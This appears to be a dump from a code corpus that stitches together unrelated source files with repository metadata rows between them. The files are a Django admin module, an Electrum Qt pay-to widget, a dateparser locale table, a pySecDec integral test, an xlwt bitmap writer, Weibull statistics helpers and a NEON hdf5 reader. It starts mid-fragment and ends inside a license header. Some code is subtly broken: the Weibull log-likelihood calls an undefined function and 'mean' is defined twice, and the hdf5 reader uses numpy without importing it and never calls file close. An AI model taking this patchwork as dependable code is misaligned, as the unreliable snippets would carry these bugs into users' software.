remove_ext_name = ['.pyc', '.png', '.csv', 'original_' + xml_file_name])
print 'Done'
print 'Total run time is %f.' % (timeit.default_timer() - start_time)
|
mit
| -8,668,873,927,178,910,000 | 28.970551 | 96 | 0.594181 | false |
botswana-harvard/getresults-csv
|
getresults_csv/admin.py
|
1
|
1632
|
from django.contrib import admin
from edc_base.modeladmin.admin import LimitedAdminInlineMixin
from getresults.admin import admin_site
from .models import ExportHistory, ImportHistory, CsvFormat, CsvField, CsvDictionary
from getresults_csv.forms import CsvDictionaryForm
class CsvFieldAdmin(admin.ModelAdmin):
list_display = ('csv_format', 'name')
admin_site.register(CsvField, CsvFieldAdmin)
class CsvDictionaryAdmin(admin.ModelAdmin):
form = CsvDictionaryForm
list_display = ('csv_format', 'csv_field', 'processing_field', 'utestid')
search_fields = ('csv_field', 'processing_field', 'utestid__name')
admin_site.register(CsvDictionary, CsvDictionaryAdmin)
class CsvDictionaryInline(LimitedAdminInlineMixin, admin.TabularInline):
model = CsvDictionary
form = CsvDictionaryForm
extra = 0
def get_filters(self, obj):
if obj:
return (('csv_field', dict(csv_format=obj.id)),)
else:
return ()
class CsvFormatAdmin(admin.ModelAdmin):
list_display = ('name', 'sender_model', 'delimiter', 'encoding')
inlines = [CsvDictionaryInline]
admin_site.register(CsvFormat, CsvFormatAdmin)
class ImportHistoryAdmin(admin.ModelAdmin):
list_display = ('source', 'import_datetime', 'record_count')
search_fields = ('source', 'import_datetime', 'record_count')
admin_site.register(ImportHistory, ImportHistoryAdmin)
class ExportHistoryAdmin(admin.ModelAdmin):
list_display = ('destination', 'export_datetime', 'reference')
search_fields = ('destination', 'export_datetime', 'reference')
admin_site.register(ExportHistory, ExportHistoryAdmin)
|
gpl-2.0
| -5,663,246,594,499,837,000 | 32.306122 | 84 | 0.735294 | false |
protonn/Electrum-Cash
|
gui/qt/paytoedit.py
|
1
|
9510
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from qrtextedit import ScanQRTextEdit
import re
from decimal import Decimal
from electrum_dgb import bitcoin
import util
RE_ADDRESS = '[1-9A-HJ-NP-Za-km-z]{26,}'
RE_ALIAS = '(.*?)\s*\<([1-9A-HJ-NP-Za-km-z]{26,})\>'
frozen_style = "QWidget { background-color:none; border:none;}"
normal_style = "QPlainTextEdit { }"
class PayToEdit(ScanQRTextEdit):
def __init__(self, win):
ScanQRTextEdit.__init__(self)
self.win = win
self.amount_edit = win.amount_e
self.document().contentsChanged.connect(self.update_size)
self.heightMin = 0
self.heightMax = 150
self.c = None
self.textChanged.connect(self.check_text)
self.outputs = []
self.errors = []
self.is_pr = False
self.is_alias = False
self.scan_f = win.pay_to_URI
self.update_size()
self.payto_address = None
self.previous_payto = ''
def setFrozen(self, b):
self.setReadOnly(b)
self.setStyleSheet(frozen_style if b else normal_style)
for button in self.buttons:
button.setHidden(b)
def setGreen(self):
self.setStyleSheet(util.GREEN_BG)
def setExpired(self):
self.setStyleSheet(util.RED_BG)
def parse_address_and_amount(self, line):
x, y = line.split(',')
out_type, out = self.parse_output(x)
amount = self.parse_amount(y)
return out_type, out, amount
def parse_output(self, x):
try:
address = self.parse_address(x)
return bitcoin.TYPE_ADDRESS, address
except:
script = self.parse_script(x)
return bitcoin.TYPE_SCRIPT, script
def parse_script(self, x):
from electrum_dgb.transaction import opcodes, push_script
script = ''
for word in x.split():
if word[0:3] == 'OP_':
assert word in opcodes.lookup
script += chr(opcodes.lookup[word])
else:
script += push_script(word).decode('hex')
return script
def parse_amount(self, x):
if x.strip() == '!':
return '!'
p = pow(10, self.amount_edit.decimal_point())
return int(p * Decimal(x.strip()))
def parse_address(self, line):
r = line.strip()
m = re.match('^'+RE_ALIAS+'$', r)
address = str(m.group(2) if m else r)
assert bitcoin.is_address(address)
return address
def check_text(self):
self.errors = []
if self.is_pr:
return
# filter out empty lines
lines = filter(lambda x: x, self.lines())
outputs = []
total = 0
self.payto_address = None
if len(lines) == 1:
data = lines[0]
if data.startswith("digibyte:"):
self.scan_f(data)
return
try:
self.payto_address = self.parse_output(data)
except:
pass
if self.payto_address:
self.win.lock_amount(False)
return
is_max = False
for i, line in enumerate(lines):
try:
_type, to_address, amount = self.parse_address_and_amount(line)
except:
self.errors.append((i, line.strip()))
continue
outputs.append((_type, to_address, amount))
if amount == '!':
is_max = True
else:
total += amount
self.win.is_max = is_max
self.outputs = outputs
self.payto_address = None
if self.win.is_max:
self.win.do_update_fee()
else:
self.amount_edit.setAmount(total if outputs else None)
self.win.lock_amount(total or len(lines)>1)
def get_errors(self):
return self.errors
def get_recipient(self):
return self.payto_address
def get_outputs(self, is_max):
if self.payto_address:
if is_max:
amount = '!'
else:
amount = self.amount_edit.get_amount()
_type, addr = self.payto_address
self.outputs = [(_type, addr, amount)]
return self.outputs[:]
def lines(self):
return unicode(self.toPlainText()).split('\n')
def is_multiline(self):
return len(self.lines()) > 1
def paytomany(self):
self.setText("\n\n\n")
self.update_size()
def update_size(self):
docHeight = self.document().size().height()
h = docHeight*17 + 11
if self.heightMin <= h <= self.heightMax:
self.setMinimumHeight(h)
self.setMaximumHeight(h)
self.verticalScrollBar().hide()
def setCompleter(self, completer):
self.c = completer
self.c.setWidget(self)
self.c.setCompletionMode(QCompleter.PopupCompletion)
self.c.activated.connect(self.insertCompletion)
def insertCompletion(self, completion):
if self.c.widget() != self:
return
tc = self.textCursor()
extra = completion.length() - self.c.completionPrefix().length()
tc.movePosition(QTextCursor.Left)
tc.movePosition(QTextCursor.EndOfWord)
tc.insertText(completion.right(extra))
self.setTextCursor(tc)
def textUnderCursor(self):
tc = self.textCursor()
tc.select(QTextCursor.WordUnderCursor)
return tc.selectedText()
def keyPressEvent(self, e):
if self.isReadOnly():
return
if self.c.popup().isVisible():
if e.key() in [Qt.Key_Enter, Qt.Key_Return]:
e.ignore()
return
if e.key() in [Qt.Key_Tab]:
e.ignore()
return
if e.key() in [Qt.Key_Down, Qt.Key_Up] and not self.is_multiline():
e.ignore()
return
QPlainTextEdit.keyPressEvent(self, e)
ctrlOrShift = e.modifiers() and (Qt.ControlModifier or Qt.ShiftModifier)
if self.c is None or (ctrlOrShift and e.text().isEmpty()):
return
eow = QString("~!@#$%^&*()_+{}|:\"<>?,./;'[]\\-=")
hasModifier = (e.modifiers() != Qt.NoModifier) and not ctrlOrShift;
completionPrefix = self.textUnderCursor()
if hasModifier or e.text().isEmpty() or completionPrefix.length() < 1 or eow.contains(e.text().right(1)):
self.c.popup().hide()
return
if completionPrefix != self.c.completionPrefix():
self.c.setCompletionPrefix(completionPrefix);
self.c.popup().setCurrentIndex(self.c.completionModel().index(0, 0))
cr = self.cursorRect()
cr.setWidth(self.c.popup().sizeHintForColumn(0) + self.c.popup().verticalScrollBar().sizeHint().width())
self.c.complete(cr)
def qr_input(self):
data = super(PayToEdit,self).qr_input()
if data.startswith("digibyte:"):
self.scan_f(data)
# TODO: update fee
def resolve(self):
self.is_alias = False
if self.hasFocus():
return
if self.is_multiline(): # only supports single line entries atm
return
if self.is_pr:
return
key = str(self.toPlainText())
if key == self.previous_payto:
return
self.previous_payto = key
if not (('.' in key) and (not '<' in key) and (not ' ' in key)):
return
try:
data = self.win.contacts.resolve(key)
except:
return
if not data:
return
self.is_alias = True
address = data.get('address')
name = data.get('name')
new_url = key + ' <' + address + '>'
self.setText(new_url)
self.previous_payto = new_url
#if self.win.config.get('openalias_autoadd') == 'checked':
self.win.contacts[key] = ('openalias', name)
self.win.contact_list.on_update()
self.setFrozen(True)
if data.get('type') == 'openalias':
self.validated = data.get('validated')
if self.validated:
self.setGreen()
else:
self.setExpired()
else:
self.validated = None
|
mit
| -1,738,034,398,156,646,700 | 30.078431 | 113 | 0.573817 | false |
scrapinghub/dateparser
|
dateparser/data/date_translation_data/ksf.py
|
1
|
2783
|
info = {
"name": "ksf",
"date_order": "DMY",
"january": [
"ŋ1",
"ŋwíí a ntɔ́ntɔ"
],
"february": [
"ŋ2",
"ŋwíí akǝ bɛ́ɛ"
],
"march": [
"ŋ3",
"ŋwíí akǝ ráá"
],
"april": [
"ŋ4",
"ŋwíí akǝ nin"
],
"may": [
"ŋ5",
"ŋwíí akǝ táan"
],
"june": [
"ŋ6",
"ŋwíí akǝ táafɔk"
],
"july": [
"ŋ7",
"ŋwíí akǝ táabɛɛ"
],
"august": [
"ŋ8",
"ŋwíí akǝ táaraa"
],
"september": [
"ŋ9",
"ŋwíí akǝ táanin"
],
"october": [
"ŋ10",
"ŋwíí akǝ ntɛk"
],
"november": [
"ŋ11",
"ŋwíí akǝ ntɛk di bɔ́k"
],
"december": [
"ŋ12",
"ŋwíí akǝ ntɛk di bɛ́ɛ"
],
"monday": [
"lǝn",
"lǝndí"
],
"tuesday": [
"maa",
"maadí"
],
"wednesday": [
"mɛk",
"mɛkrɛdí"
],
"thursday": [
"jǝǝ",
"jǝǝdí"
],
"friday": [
"júm",
"júmbá"
],
"saturday": [
"sam",
"samdí"
],
"sunday": [
"sɔ́n",
"sɔ́ndǝ"
],
"am": [
"sárúwá"
],
"pm": [
"cɛɛ́nko"
],
"year": [
"bǝk"
],
"month": [
"ŋwíí"
],
"week": [
"sɔ́ndǝ"
],
"day": [
"ŋwós"
],
"hour": [
"cámɛɛn"
],
"minute": [
"mǝnít"
],
"second": [
"háu"
],
"relative-type": {
"0 day ago": [
"gɛ́ɛnǝ"
],
"0 hour ago": [
"this hour"
],
"0 minute ago": [
"this minute"
],
"0 month ago": [
"this month"
],
"0 second ago": [
"now"
],
"0 week ago": [
"this week"
],
"0 year ago": [
"this year"
],
"1 day ago": [
"rinkɔɔ́"
],
"1 month ago": [
"last month"
],
"1 week ago": [
"last week"
],
"1 year ago": [
"last year"
],
"in 1 day": [
"ridúrǝ́"
],
"in 1 month": [
"next month"
],
"in 1 week": [
"next week"
],
"in 1 year": [
"next year"
]
},
"locale_specific": {},
"skip": [
" ",
"'",
",",
"-",
".",
"/",
";",
"@",
"[",
"]",
"|",
","
]
}
|
bsd-3-clause
| -6,306,315,758,747,220,000 | 14.650888 | 31 | 0.272212 | false |
mppmu/secdec
|
high_level_tests/box1L_rank4/test/test.py
|
1
|
3321
|
from __future__ import print_function
from pySecDec.integral_interface import IntegralLibrary
import sympy as sp
import unittest
class CheckLib(unittest.TestCase):
def setUp(self):
# load c++ library
self.lib = IntegralLibrary('../box1L_rank4/box1L_rank4_pylink.so')
self.real_parameters = [16.0, -75.0, 1.0]
self.maxeval = 10**8
self.epsrel = 1e-10
self.epsabs = 1e-13
self.target_result_without_prefactor = \
{
0: 97.52083333333 + 0.0j,
1: -124.937368867 - 11.9030583278j
}
self.target_prefactor = \
{
-1: 1.0,
0: -0.57721566490153,
}
self.target_result_with_prefactor = \
{
-1: 97.52083333333 + 0.0j,
0: -181.22792152123 - 11.903058327787j
}
def check_result(self, computed_series, target_series, epsrel, epsabs, order_min, order_max):
# convert result to sympy expressions
computed_series = sp.sympify( computed_series.replace(',','+I*').replace('+/-','*value+error*') )
for order in range(order_min, order_max+1):
value = complex( computed_series.coeff('eps',order).coeff('value') )
error = complex( computed_series.coeff('eps',order).coeff('error') )
# check that the uncertainties are reasonable
self.assertLessEqual(error.real, abs(2*epsrel * target_series[order].real))
if target_series[order].imag != 0.0:
self.assertLessEqual(error.imag, abs(2*epsrel * target_series[order].imag))
# check that the desired uncertainties are reached
self.assertLessEqual(error.real, abs(epsrel * value.real) )
if target_series[order].imag == 0.0:
self.assertLessEqual(error.imag, epsabs)
else:
self.assertLessEqual(error.imag, abs(epsrel * value.imag) )
# check integral value
self.assertAlmostEqual( value.real, target_series[order].real, delta=epsrel*abs(target_series[order].real) )
if target_series[order].imag == 0.0:
self.assertAlmostEqual( value.imag, target_series[order].imag, delta=epsabs )
else:
self.assertAlmostEqual( value.imag, target_series[order].imag, delta=epsrel*abs(target_series[order].imag) )
def test_Cuhre(self):
# choose integrator
self.lib.use_Cuhre(epsrel=self.epsrel, maxeval=self.maxeval, epsabs=self.epsabs, real_complex_together=True)
# integrate
str_integral_without_prefactor, str_prefactor, str_integral_with_prefactor = self.lib(self.real_parameters)
# check integral
self.check_result(str_integral_without_prefactor, self.target_result_without_prefactor, self.epsrel, self.epsabs, order_min=0, order_max=1)
self.check_result(str_integral_with_prefactor, self.target_result_with_prefactor, self.epsrel, self.epsabs, order_min=-1, order_max=0)
# check prefactor
prefactor = sp.sympify( str_prefactor.replace(',','+I*') )
for order in (-1,0):
self.assertAlmostEqual( prefactor.coeff('eps', order), self.target_prefactor[order], delta=1e-13 )
if __name__ == '__main__':
unittest.main()
|
gpl-3.0
| 7,984,500,369,133,681,000 | 43.28 | 147 | 0.611864 | false |
sternshus/arelle2.7
|
svr-2.7/arelle/xlwt/Bitmap.py
|
1
|
10392
|
# Portions are Copyright (C) 2005 Roman V. Kiseliov
# Portions are Copyright (c) 2004 Evgeny Filatov <fufff@users.sourceforge.net>
# Portions are Copyright (c) 2002-2004 John McNamara (Perl Spreadsheet::WriteExcel)
from arelle.xlwt.BIFFRecords import BiffRecord
from struct import *
def _size_col(sheet, col):
return sheet.col_width(col)
def _size_row(sheet, row):
return sheet.row_height(row)
def _position_image(sheet, row_start, col_start, x1, y1, width, height):
"""Calculate the vertices that define the position of the image as required by
the OBJ record.
+------------+------------+
| A | B |
+-----+------------+------------+
| |(x1,y1) | |
| 1 |(A1)._______|______ |
| | | | |
| | | | |
+-----+----| BITMAP |-----+
| | | | |
| 2 | |______________. |
| | | (B2)|
| | | (x2,y2)|
+---- +------------+------------+
Example of a bitmap that covers some of the area from cell A1 to cell B2.
Based on the width and height of the bitmap we need to calculate 8 vars:
col_start, row_start, col_end, row_end, x1, y1, x2, y2.
The width and height of the cells are also variable and have to be taken into
account.
The values of col_start and row_start are passed in from the calling
function. The values of col_end and row_end are calculated by subtracting
the width and height of the bitmap from the width and height of the
underlying cells.
The vertices are expressed as a percentage of the underlying cell width as
follows (rhs values are in pixels):
x1 = X / W *1024
y1 = Y / H *256
x2 = (X-1) / W *1024
y2 = (Y-1) / H *256
Where: X is distance from the left side of the underlying cell
Y is distance from the top of the underlying cell
W is the width of the cell
H is the height of the cell
Note: the SDK incorrectly states that the height should be expressed as a
percentage of 1024.
col_start - Col containing upper left corner of object
row_start - Row containing top left corner of object
x1 - Distance to left side of object
y1 - Distance to top of object
width - Width of image frame
height - Height of image frame
"""
# Adjust start column for offsets that are greater than the col width
while x1 >= _size_col(sheet, col_start):
x1 -= _size_col(sheet, col_start)
col_start += 1
# Adjust start row for offsets that are greater than the row height
while y1 >= _size_row(sheet, row_start):
y1 -= _size_row(sheet, row_start)
row_start += 1
# Initialise end cell to the same as the start cell
row_end = row_start # Row containing bottom right corner of object
col_end = col_start # Col containing lower right corner of object
width = width + x1 - 1
height = height + y1 - 1
# Subtract the underlying cell widths to find the end cell of the image
while (width >= _size_col(sheet, col_end)):
width -= _size_col(sheet, col_end)
col_end += 1
# Subtract the underlying cell heights to find the end cell of the image
while (height >= _size_row(sheet, row_end)):
height -= _size_row(sheet, row_end)
row_end += 1
# Bitmap isn't allowed to start or finish in a hidden cell, i.e. a cell
# with zero height or width.
if ((_size_col(sheet, col_start) == 0) or (_size_col(sheet, col_end) == 0)
or (_size_row(sheet, row_start) == 0) or (_size_row(sheet, row_end) == 0)):
return
# Convert the pixel values to the percentage value expected by Excel
x1 = int(float(x1) / _size_col(sheet, col_start) * 1024)
y1 = int(float(y1) / _size_row(sheet, row_start) * 256)
# Distance to right side of object
x2 = int(float(width) / _size_col(sheet, col_end) * 1024)
# Distance to bottom of object
y2 = int(float(height) / _size_row(sheet, row_end) * 256)
return (col_start, x1, row_start, y1, col_end, x2, row_end, y2)
class ObjBmpRecord(BiffRecord):
_REC_ID = 0x005D # Record identifier
def __init__(self, row, col, sheet, im_data_bmp, x, y, scale_x, scale_y):
# Scale the frame of the image.
width = im_data_bmp.width * scale_x
height = im_data_bmp.height * scale_y
# Calculate the vertices of the image and write the OBJ record
coordinates = _position_image(sheet, row, col, x, y, width, height)
# print coordinates
col_start, x1, row_start, y1, col_end, x2, row_end, y2 = coordinates
"""Store the OBJ record that precedes an IMDATA record. This could be generalise
to support other Excel objects.
"""
cObj = 0x0001 # Count of objects in file (set to 1)
OT = 0x0008 # Object type. 8 = Picture
id = 0x0001 # Object ID
grbit = 0x0614 # Option flags
colL = col_start # Col containing upper left corner of object
dxL = x1 # Distance from left side of cell
rwT = row_start # Row containing top left corner of object
dyT = y1 # Distance from top of cell
colR = col_end # Col containing lower right corner of object
dxR = x2 # Distance from right of cell
rwB = row_end # Row containing bottom right corner of object
dyB = y2 # Distance from bottom of cell
cbMacro = 0x0000 # Length of FMLA structure
Reserved1 = 0x0000 # Reserved
Reserved2 = 0x0000 # Reserved
icvBack = 0x09 # Background colour
icvFore = 0x09 # Foreground colour
fls = 0x00 # Fill pattern
fAuto = 0x00 # Automatic fill
icv = 0x08 # Line colour
lns = 0xff # Line style
lnw = 0x01 # Line weight
fAutoB = 0x00 # Automatic border
frs = 0x0000 # Frame style
cf = 0x0009 # Image format, 9 = bitmap
Reserved3 = 0x0000 # Reserved
cbPictFmla = 0x0000 # Length of FMLA structure
Reserved4 = 0x0000 # Reserved
grbit2 = 0x0001 # Option flags
Reserved5 = 0x0000 # Reserved
data = pack("<L", cObj)
data += pack("<H", OT)
data += pack("<H", id)
data += pack("<H", grbit)
data += pack("<H", colL)
data += pack("<H", dxL)
data += pack("<H", rwT)
data += pack("<H", dyT)
data += pack("<H", colR)
data += pack("<H", dxR)
data += pack("<H", rwB)
data += pack("<H", dyB)
data += pack("<H", cbMacro)
data += pack("<L", Reserved1)
data += pack("<H", Reserved2)
data += pack("<B", icvBack)
data += pack("<B", icvFore)
data += pack("<B", fls)
data += pack("<B", fAuto)
data += pack("<B", icv)
data += pack("<B", lns)
data += pack("<B", lnw)
data += pack("<B", fAutoB)
data += pack("<H", frs)
data += pack("<L", cf)
data += pack("<H", Reserved3)
data += pack("<H", cbPictFmla)
data += pack("<H", Reserved4)
data += pack("<H", grbit2)
data += pack("<L", Reserved5)
self._rec_data = data
def _process_bitmap(bitmap):
"""Convert a 24 bit bitmap into the modified internal format used by Windows.
This is described in BITMAPCOREHEADER and BITMAPCOREINFO structures in the
MSDN library.
"""
# Open file and binmode the data in case the platform needs it.
fh = open(bitmap, 'rb')
try:
# Slurp the file into a string.
data = fh.read()
finally:
fh.close()
# Check that the file is big enough to be a bitmap.
if len(data) <= 0x36:
raise Exception("bitmap doesn't contain enough data.")
# The first 2 bytes are used to identify the bitmap.
if (data[:2] != b"BM"):
raise Exception("bitmap doesn't appear to to be a valid bitmap image.")
# Remove bitmap data: ID.
data = data[2:]
# Read and remove the bitmap size. This is more reliable than reading
# the data size at offset 0x22.
#
size = unpack("<L", data[:4])[0]
size -= 0x36 # Subtract size of bitmap header.
size += 0x0C # Add size of BIFF header.
data = data[4:]
# Remove bitmap data: reserved, offset, header length.
data = data[12:]
# Read and remove the bitmap width and height. Verify the sizes.
width, height = unpack("<LL", data[:8])
data = data[8:]
if (width > 0xFFFF):
raise Exception("bitmap: largest image width supported is 65k.")
if (height > 0xFFFF):
raise Exception("bitmap: largest image height supported is 65k.")
# Read and remove the bitmap planes and bpp data. Verify them.
planes, bitcount = unpack("<HH", data[:4])
data = data[4:]
if (bitcount != 24):
raise Exception("bitmap isn't a 24bit true color bitmap.")
if (planes != 1):
raise Exception("bitmap: only 1 plane supported in bitmap image.")
# Read and remove the bitmap compression. Verify compression.
compression = unpack("<L", data[:4])[0]
data = data[4:]
if (compression != 0):
raise Exception("bitmap: compression not supported in bitmap image.")
# Remove bitmap data: data size, hres, vres, colours, imp. colours.
data = data[20:]
# Add the BITMAPCOREHEADER data
header = pack("<LHHHH", 0x000c, width, height, 0x01, 0x18)
data = header + data
return (width, height, size, data)
class ImDataBmpRecord(BiffRecord):
_REC_ID = 0x007F
def __init__(self, filename):
"""Insert a 24bit bitmap image in a worksheet. The main record required is
IMDATA but it must be proceeded by a OBJ record to define its position.
"""
BiffRecord.__init__(self)
self.width, self.height, self.size, data = _process_bitmap(filename)
# Write the IMDATA record to store the bitmap data
cf = 0x09
env = 0x01
lcb = self.size
self._rec_data = pack("<HHL", cf, env, lcb) + data
|
apache-2.0
| 6,240,996,760,064,364,000 | 39.27907 | 88 | 0.570439 | false |
ragulpr/wtte-rnn
|
python/wtte/weibull.py
|
1
|
5548
|
"""
Wrapper for Python Weibull functions
"""
import numpy as np
def cumulative_hazard(t, a, b):
""" Cumulative hazard
:param t: Value
:param a: Alpha
:param b: Beta
:return: `np.power(t / a, b)`
"""
t = np.double(t)
return np.power(t / a, b)
def hazard(t, a, b):
t = np.double(t)
return (b / a) * np.power(t / a, b - 1)
def cdf(t, a, b):
""" Cumulative distribution function.
:param t: Value
:param a: Alpha
:param b: Beta
:return: `1 - np.exp(-np.power(t / a, b))`
"""
t = np.double(t)
return 1 - np.exp(-np.power(t / a, b))
def pdf(t, a, b):
""" Probability distribution function.
:param t: Value
:param a: Alpha
:param b: Beta
:return: `(b / a) * np.power(t / a, b - 1) * np.exp(-np.power(t / a, b))`
"""
t = np.double(t)
return (b / a) * np.power(t / a, b - 1) * np.exp(-np.power(t / a, b))
def cmf(t, a, b):
""" Cumulative Mass Function.
:param t: Value
:param a: Alpha
:param b: Beta
:return: `cdf(t + 1, a, b)`
"""
t = np.double(t) + 1e-35
return cdf(t + 1, a, b)
def pmf(t, a, b):
""" Probability mass function.
:param t: Value
:param a: Alpha
:param b: Beta
:return: `cdf(t + 1.0, a, b) - cdf(t, a, b)`
"""
t = np.double(t) + 1e-35
return cdf(t + 1.0, a, b) - cdf(t, a, b)
def mode(a, b):
# Continuous mode.
# TODO (mathematically) prove how close it is to discretized mode
try:
mode = a * np.power((b - 1.0) / b, 1.0 / b)
mode[b <= 1.0] = 0.0
except:
# scalar case
if b <= 1.0:
mode = 0
else:
mode = a * np.power((b - 1.0) / b, 1.0 / b)
return mode
def mean(a, b):
""" Continuous mean. at most 1 step below discretized mean
`E[T ] <= E[Td] + 1` true for positive distributions.
"""
from scipy.special import gamma
return a * gamma(1.0 + 1.0 / b)
def quantiles(a, b, p):
""" Quantiles
:param a: Alpha
:param b: Beta
:param p:
:return: `a * np.power(-np.log(1.0 - p), 1.0 / b)`
"""
return a * np.power(-np.log(1.0 - p), 1.0 / b)
def mean(a, b):
"""Continuous mean. Theoretically at most 1 step below discretized mean
`E[T ] <= E[Td] + 1` true for positive distributions.
:param a: Alpha
:param b: Beta
:return: `a * gamma(1.0 + 1.0 / b)`
"""
from scipy.special import gamma
return a * gamma(1.0 + 1.0 / b)
def continuous_loglik(t, a, b, u=1, equality=False):
"""Continous censored loglikelihood function.
:param bool equality: In ML we usually only care about the likelihood
with *proportionality*, removing terms not dependent on the parameters.
If this is set to `True` we keep those terms.
"""
if equality:
loglik = u * np.log(pdf(t, a, b)) + (1 - u) * \
np.log(1.0 - cdf(t, a, b))
else:
# commonly optimized over: proportional terms w.r.t alpha,beta
loglik = u * loglik(hazard(t, a, b)) - \
loglik(cumulative_hazard(t, a, b))
return loglik
def discrete_loglik(t, a, b, u=1, equality=False):
"""Discrete censored loglikelihood function.
:param bool equality: In ML we usually only care about the likelihood
with *proportionality*, removing terms not dependent on the parameters.
If this is set to `True` we keep those terms.
"""
if equality:
# With equality instead of proportionality.
loglik = u * np.log(pmf(t, a, b)) + (1 - u) * \
np.log(1.0 - cdf(t + 1.0, a, b))
else:
# commonly optimized over: proportional terms w.r.t alpha,beta
hazard0 = cumulative_hazard(t, a, b)
hazard1 = cumulative_hazard(t + 1., a, b)
loglik = u * np.log(np.exp(hazard1 - hazard0) - 1.0) - hazard1
return loglik
# Conditional excess
class conditional_excess():
""" Experimental class for conditional excess distribution.
The idea is to query `s` into the future after time `t`
has passed without event. Se thesis for details.
note: Note tested and may be incorrect!
"""
def pdf(t, s, a, b):
t = np.double(t)
return hazard(t + s, a, b) * np.exp(-cumulative_hazard(t + s, a, b) + cumulative_hazard(t, a, b))
def cdf(t, s, a, b):
t = np.double(t)
return 1 - np.exp(-cumulative_hazard(t + s, a, b) + cumulative_hazard(t, a, b))
def quantile(t, a, b, p):
# TODO this is not tested yet.
# tests:
# cequantile(0., a, b, p)==quantiles(a, b, p)
# cequantile(t, a, 1., p)==cequantile(0., a, 1., p)
# conditional excess quantile
# t+s : Pr(Y<t+s|y>t)=p
print('not tested')
L = np.power((t + .0) / a, b)
quantile = a * np.power(-np.log(1. - p) - L, 1. / b)
return quantile
def mean(t, a, b):
# TODO this is not tested yet.
# tests:
# cemean(0., a, b)==mean(a, b, p)
# mean(t, a, 1., p)==mean(0., a, 1., p) == a
# conditional excess mean
# E[Y|y>t]
# (conditional mean age at failure)
# http://reliabilityanalyticstoolkit.appspot.com/conditional_distribution
from scipy.special import gamma
from scipy.special import gammainc
# Regularized lower gamma
print('not tested')
v = 1. + 1. / b
gv = gamma(v)
L = np.power((t + .0) / a, b)
cemean = a * gv * np.exp(L) * (1 - gammainc(v, t / a) / gv)
return cemean
|
mit
| 3,363,990,892,926,508,500 | 25.293839 | 105 | 0.541637 | false |
mjones01/NEON-Data-Skills
|
tutorials-in-development/DI-remote-sensing-python/neon_aop_spectral_python_functions_tiled_data/aop_h5refl2array.py
|
1
|
3682
|
def aop_h5refl2array(refl_filename):
"""read in NEON AOP reflectance hdf5 file, convert to a cleaned reflectance
array and return associated metadata (spatial information and band center
wavelengths)
Parameters
----------
refl_filename : string
reflectance hdf5 file name, including full or relative path
Returns
--------
reflArray : ndarray
array of reflectance values
metadata: dictionary
associated metadata containing
bad_band_window1 (tuple)
bad_band_window2 (tuple)
bands: # of bands (float)
data ignore value: value corresponding to no data (float)
epsg: coordinate system code (float)
map info: coordinate system, datum & ellipsoid, pixel dimensions, and origin coordinates (string)
reflectance scale factor: factor by which reflectance is scaled (float)
wavelength: center wavelengths of bands (float)
wavelength unit: 'm' (string)
--------
NOTE: This function applies to the NEON hdf5 format implemented in 2016, and should be used for
data acquired 2016 and after. Data in earlier NEON hdf5 format (collected prior to 2016) is
expected to be re-processed after the 2018 flight season.
--------
Example Execution:
--------
sercRefl, sercRefl_metadata = h5refl2array('NEON_D02_SERC_DP3_368000_4306000_reflectance.h5') """
import h5py
#Read in reflectance hdf5 file
hdf5_file = h5py.File(refl_filename,'r')
#Get the site name
file_attrs_string = str(list(hdf5_file.items()))
file_attrs_string_split = file_attrs_string.split("'")
sitename = file_attrs_string_split[1]
#Extract the reflectance & wavelength datasets
refl = hdf5_file[sitename]['Reflectance']
reflData = refl['Reflectance_Data']
reflRaw = refl['Reflectance_Data'].value
#Create dictionary containing relevant metadata information
metadata = {}
metadata['map info'] = refl['Metadata']['Coordinate_System']['Map_Info'].value
metadata['wavelength'] = refl['Metadata']['Spectral_Data']['Wavelength'].value
#Extract no data value & scale factor
metadata['data ignore value'] = float(reflData.attrs['Data_Ignore_Value'])
metadata['reflectance scale factor'] = float(reflData.attrs['Scale_Factor'])
#metadata['interleave'] = reflData.attrs['Interleave']
#Apply no data value
reflClean = reflRaw.astype(float)
arr_size = reflClean.shape
if metadata['data ignore value'] in reflRaw:
print('% No Data: ',np.round(np.count_nonzero(reflClean==metadata['data ignore value'])*100/(arr_size[0]*arr_size[1]*arr_size[2]),1))
nodata_ind = np.where(reflClean==metadata['data ignore value'])
reflClean[nodata_ind]=np.nan
#Apply scale factor
reflArray = reflClean/metadata['reflectance scale factor']
#Extract spatial extent from attributes
metadata['spatial extent'] = reflData.attrs['Spatial_Extent_meters']
#Extract bad band windows
metadata['bad band window1'] = (refl.attrs['Band_Window_1_Nanometers'])
metadata['bad band window2'] = (refl.attrs['Band_Window_2_Nanometers'])
#Extract projection information
#metadata['projection'] = refl['Metadata']['Coordinate_System']['Proj4'].value
metadata['epsg'] = int(refl['Metadata']['Coordinate_System']['EPSG Code'].value)
#Extract map information: spatial extent & resolution (pixel size)
mapInfo = refl['Metadata']['Coordinate_System']['Map_Info'].value
hdf5_file.close
return reflArray, metadata
|
agpl-3.0
| -3,099,062,738,407,099,000 | 40.852273 | 141 | 0.660511 | false |
twitter/heron
|
integration_test/src/python/local_test_runner/main.py
|
2
|
5882
|
#!/usr/bin/env python3
# -*- encoding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
